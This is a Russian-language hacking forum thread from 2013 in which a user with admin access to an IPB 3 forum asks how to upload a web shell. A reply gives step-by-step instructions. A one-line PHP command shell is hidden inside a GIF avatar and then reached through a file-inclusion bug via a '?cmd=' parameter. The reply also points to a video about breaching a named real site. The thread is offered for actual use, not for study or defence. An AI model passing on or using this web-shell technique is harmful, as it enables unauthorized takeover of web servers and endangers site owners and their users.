Ne3na1ka 17 Опубликовано 24 января, 2013 (изменено) Есть доступ к админке в IPB 3 Как залить туда shell Если будет скажите как будут новые шары Дам на пиво ICQ 369645824 Skype:game_x24 Изменено 24 января, 2013 пользователем Ne3na1ka Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
BooGiMaN 14 Опубликовано 24 января, 2013 Есть доступ к админке в IPB 3 Как залить туда shell Если будет скажите как будут новые шары Вы форумом немного ошиблись вам на жук Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
Ne3na1ka 17 Опубликовано 24 января, 2013 Да я вкурсах может тут кто-то подскажет) Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
stasuk25 17 Опубликовано 24 января, 2013 (изменено) Там где заливать шаблон, выбери шелл и попробуй залить, либо же ищи каким еще методом можно залить, на сколько знаю можно через админку аватар менять, ну изменяем картинку в ней пишем шелл, далее заливаем ее как аватар, и можно творить чудо С тебя ++ Изменено 24 января, 2013 пользователем stasuk25 1 Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
Ne3na1ka 17 Опубликовано 24 января, 2013 разве через аватар можно залить .php файл? Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
stasuk25 17 Опубликовано 24 января, 2013 Сохраняешь рисунок в *.gif, затем открываем её блокнотом и в самый конец каракулей. с новой строки пишем shell-code. Самый простой - <?php system($_GET["cmd"]); ?> Заливаем картинку на сайт(в качестве аватара) и если имеется уязвимость типа php-including инклудим картинку и получаем шелл. Сейчас очень тяжело найти сайт корый не фильтровал бы содержимое аватара и содержал бы в себе багу php-including'а. Если тебя заинтересовала это тема советую посмотреть видео - взлом rabota.ru, там через как я понял смежный сайт - ucheba.ru ломается rabota.ru и всё это с использованием инклуда и боевой аватары! Все сылки НЕ РЕКЛАМА в качестве помочь создателю темы! 1 Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
Ne3na1ka 17 Опубликовано 24 января, 2013 картинку загрузил как это сделать php-including инклудим картинку и получаем шелл Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
stasuk25 17 Опубликовано 24 января, 2013 Узнай путь к картинке, затем вставь ее в новом окне и допиши после .gif?cmd= и сделай что надо. Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты